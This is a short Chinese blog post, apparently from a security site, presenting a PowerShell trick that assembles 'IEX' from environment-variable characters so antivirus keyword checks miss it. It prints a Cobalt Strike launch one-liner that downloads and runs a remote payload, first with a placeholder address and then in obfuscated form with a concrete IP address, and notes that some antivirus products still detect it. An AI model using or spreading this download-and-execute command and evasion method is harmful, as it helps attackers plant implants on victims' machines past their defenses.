IEX环境变量替换脚本-作者 No 0.@Rmy

脚本作者:No 0.@Rmy

利用原理是:抽取环境变量中的字符再将其拼接为IEX
优势:混淆了iex避免一些杀毒软件的关键词检测

 powershell -exec bypass -f Invoke-PowerShellIexBuilder.ps1 > {记录文件的位置方便于复制}

-w1349

cs的ps上线命令

powershell.exe -nop -c "IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx:80/a'))"
//替换成
powershell.exe -nop -c "$($env:SystemRoot[-6]+$env:temp[5]+$env:ComSpec[-2]) ((new-object net.webclient).downloadstring(http://123.57.73.247:80/a))"

-w1094

不过这种方式放在ps脚本中还是有刺蛾作用的,如果是像cs中那种无文件落地的方式的话杀软还是会杀掉的,有的检测方式不同,比如说天擎就是杀的参数。火绒也是。因为不管你怎么转换在参数重传入的命令/值还是原本的内容。
只有是在本地加载ps1脚本的时候可能会有些用处,

本文链接:

http://8sec.cc/index.php/archives/350/
1 + 9 =
快来做第一个评论的人吧~